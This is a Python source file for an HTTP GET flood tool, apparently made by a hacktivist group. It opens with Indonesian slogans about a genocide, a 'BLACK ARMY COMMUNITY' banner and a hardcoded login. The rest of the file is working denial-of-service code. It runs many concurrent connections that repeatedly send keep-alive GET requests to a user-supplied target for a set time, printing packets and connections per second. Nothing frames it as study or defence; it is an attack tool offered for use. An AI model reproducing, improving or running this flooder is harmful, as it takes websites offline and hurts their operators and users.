#!usr/bin/python
import os
import sys
import time
import fade
from asyncio import open_connection, create_task, Event, sleep, run
from yarl import URL
from sys import argv as args
from contextlib import suppress

def clear():
    os.system("cls" if os.name == "nt" else "clear")

# Color
class bcolors:
    NBlack = "\033[38;5;0m  \033[0m"
    NRed = "\033[38;5;1m  \033[0m"
    NGreen = "\033[38;5;2m  \033[0m"
    NYellow = "\033[38;5;3m  \033[0m"
    NBlue = "\033[38;5;4m  \033[0m"
    NMagenta = "\033[38;5;5m  \033[0m"
    NCyan = "\033[38;5;6m  \033[0m"
    NWhite =  "\033[38;5;7m  \033[0m"
    BrightBlack = "\033[48;5;0m  \033[0m"
    BrightRed =  "\033[48;5;1m  \033[0m"
    BrightGreen = "\033[48;5;2m  \033[0m"
    BrightYellow = "\033[48;5;3m  \033[0m"
    BrightBlue = "\033[48;5;4m  \033[0m"
    BrightMagenta = "\033[48;5;5m  \033[0m"
    BrightCyan = "\033[48;5;6m  \033[0m"
    BrightWhite = "\033[48;5;7m  \033[0m"
os.system('clear')
time.sleep(3)
print("\033[36mIni bukan tentang siapa yg pintar")
time.sleep(3)
print("\033[36mtapi tentang tangan siapa yg mau saling menggenggam")
time.sleep(3)
print("\033[36mbekerja sama dalam berjuang")
time.sleep(3)
print("\033[36mtanpa peduli akan siapa dia")
time.sleep(3)
print("\033[36mtak dikenal bahkan tanpa nama")
time.sleep(3)
print("\033[36myang jelas...")
time.sleep(3)
print("\033[36mDia tak rela melihat saudaranya di GENOSIDA")
time.sleep(5)
attemps = 0
os.system('clear')
logo = """
    в•ӯв”Җв”Җв”Җв”Җв”Җв•®в•ӯв”Җв”Җв”Җв”Җв”Җв•®в•ӯв”Җв”Җв•®    в•ӯв•® в•ӯв”Җв”Җв”Җв”Җв•® в•ӯв”Җв”Җв•®    в•ӯв•®  в•ӯв•®в•ӯв•®в”Җв”Җв”Җв”Җв”Җв•®
    в”Ӯв•ӯв”Җв”Җв”Җв•®в”Ӯв”Ӯв•ӯв”Җв”Җв”Җв•®в”Ӯв”Ӯв•ӯв•®в•°в•®   в”Ӯв”Ӯв•ӯв•Ҝв•ӯв”Җв”Җв•®в•°в•®в”Ӯв•ӯв•®в•°в•®   в”Ӯв”Ӯ  в”Ӯв”Ӯв”Ӯв•ӯв”Җв”Җв”Җв”Җв•®в”Ӯ
    в”Ӯв”Ӯ   в•°в•Ҝв”Ӯв”Ӯ   в”Ӯв”Ӯв”Ӯв”Ӯв•°в•®в•°в•®  в”Ӯв”Ӯв”Ӯв•ӯв•Ҝ  в•°в•®в”Ӯв”Ӯв”Ӯв•°в•®в•°в•®  в”Ӯв”Ӯ  в”Ӯв”Ӯв”Ӯв”Ӯ    в”Ӯв”Ӯ
    в”Ӯв”Ӯ     в”Ӯв”Ӯ   в”Ӯв”Ӯв”Ӯв”Ӯ в•°в•®в•°в•® в”Ӯв”Ӯв”Ӯв”Ӯ    в”Ӯв”Ӯв”Ӯв”Ӯ в•°в•®в•°в•® в”Ӯв”Ӯв•ӯв•®в”Ӯв”Ӯв”Ӯв”Ӯ    в”Ӯв”Ӯ
    в”Ӯв”Ӯ   в•ӯв•®в”Ӯв”Ӯ   в”Ӯв”Ӯв”Ӯв”Ӯ  в•°в•®в•°в•®в”Ӯв”Ӯв”Ӯв•°в”Җв”Җв”Җв”Җв•Ҝв”Ӯв”Ӯв”Ӯ  в•°в•®в•°в•®в”Ӯв”Ӯв•°в•Ҝв”Ӯв”Ӯв”Ӯв”Ӯ    в”Ӯв”Ӯ
    в”Ӯв•°в”Җв”Җв”Җв•Ҝв”Ӯв”Ӯв•°в”Җв”Җв”Җв•Ҝв”Ӯв”Ӯв”Ӯ   в•°в•®в•°в•Ҝв”Ӯв”Ӯв•ӯв”Җв”Җв”Җв”Җв•®в”Ӯв”Ӯв”Ӯ   в•°в•®в•°в•Ҝв”Ӯ  в”Ӯв”Ӯв”Ӯв•°в”Җв”Җв”Җв”Җв•Ҝв”Ӯ
    в•°в”Җв”Җв”Җв”Җв”Җв•Ҝв•°в”Җв”Җв”Җв”Җв”Җв•Ҝв•°в•Ҝ    в•°в”Җв”Җв•Ҝв•°в•Ҝ    в•°в•Ҝв•°в•Ҝ    в•°в”Җв”Җв•Ҝ  в•°в•Ҝв•°в•Ҝв”Җв”Җв”Җв”Җв”Җв•Ҝ
\033[36mв•®   в•ӯ\033[37mв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җ
\033[36mв”Ӯ   в”Ӯв•ӯв”Җв”Җв•ӯв”җв”Ңв”Җв”Җв”Җв•®в•®   в•ӯв•ӯв”Җв”Җв”Җв•®\033[37mв”Ңв”Җв”Җв”Җв•®в•ӯв”Җв”Җв”Җв•®в•®   в”Ңв•ӯв”Җв”Җв•ӯв”җ\033[36m в•ӯв”Җв”Җв”Җв•®в•ӯв”Җв”Җв”Җв•®в•ӯв”Җв•®в•ӯв”Җв•®
\033[36mв•°в”Җв”Җв”Җв•Ҝв”Ӯ   в”Ӯв”Ӯ   в•°в”Ӯ   в”Ӯв”Ӯ    \033[37mв”Ӯ   в”Ӯв”Ӯ   в”Ӯв”Ӯ  в•ӯв•Ҝв”Ӯ   в”Ӯ\033[36m в”Ӯ    в”Ӯ   в”Ӯв”Ӯ в”Ӯ  в”Ӯ
\033[36mв”Ӯ   в”Ӯв”Ӯ   в”Ӯв”Ӯ    в”Ӯ   в”Ӯв•°в”Җв”Җв”Җв•®\033[37mв”Ңв”Җв”Җв”Җв•Ҝв•ӯв”Җв”Җв”Җв•Ҝв”Ӯв”Җв”Җв•Ҝв•®в”Ӯ   в”Ӯ\033[36mвҖўв”Ӯ    в”Ӯ   в”Ӯв”Ӯ в”Ӯ  в”Ӯ
\033[36mв•Ҝ   в•°в•°в”Җв”Җв•°в”ҳв•Ҝ    в•°в”Җв”Җв”Җв•Ҝв•°в”Җв”Җв”Җв•Ҝ\033[37mв•Ҝ    в•°в”Җв”Җв”Җв•Ҝв•Ҝ   в•°в•°в”Җв”Җв•°в”ҳ\033[36m в•°в”Җв”Җв”Җв•Ҝв•°в”Җв”Җв”Җв•Ҝв•Ҝ    в”Ӯ
\033[37mв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв”Җв•Ҝ
"""
faded_text = fade.fire(logo)
print(faded_text)
while attemps < 100:
    username = input("\033[36mвҖў> Enter your username:\033[30m")
    password = input("\033[36mвҖў> Enter your password:\033[30m")

    if username == 'peka' and password == 'napa':
        print("\033[48;5;3mвҖўвҖўвҖўвҹ©вҹ© BLACK ARMY COMUNNITY ...!!\033[0m")
        break
    else:
        print('Incorrect credentials. Check if you have Caps lock on and try again.')
        attemps += 1
        continue

pps, cps = 0, 0

async def flooder(target: URL, payload: bytes, event: Event, rpc: int = 100):
    global pps, cps
    await event.wait()

    while event.is_set():
        with suppress(Exception):
            r, w = await open_connection(target.host, target.port or 80, ssl=target.scheme == "https")
            cps += 1
            for _ in range(rpc):
                w.write(payload)
                await w.drain()
                pps += 1

async def main():
    global pps, cps

    try:

        assert len(args) == 5, "python3 %s <target> <workers> <rpc> <timer>" % args[0]
        assert URL(args[1]) or None, "Invalid url"
        assert args[2].isdigit(), "Invalid workers integer"
        assert args[3].isdigit(), "Invalid connection pre seconds"
        assert args[4].isdigit(), "Invalid timer"
        
        target = URL(args[1])
        workers = int(args[2])
        rpc = int(args[3])
        timer = int(args[4])
        event = Event()

        payload = (
            f"GET {target.raw_path_qs} HTTP/1.1\r\n"
            f"Host: {target.raw_authority}\r\n"
            "Connection: keep-alive\r\n"
            "\r\n").encode()

        event.clear()
        
        for _ in range(workers):
            create_task(flooder(target, payload, event, rpc))
            await sleep(.0)
            
        event.set()
        
        print("Attack started to %s" % target.human_repr())

        while timer:
            pps, cps = 0, 0
            await sleep(1)
            timer -= 1
            print(f"\033[38;5;220m[c0nan.id]\033[37m PPS: {pps:,} \033[36m| CPS: {cps:,} \033[32m[Host] \033[38;5;6m{target} \033[0m\033[33m[time] \033[37m{timer:,}s")
        event.clear()
    except AssertionError as e:
        print(str(e) or repr(e))
        
run(main())

              
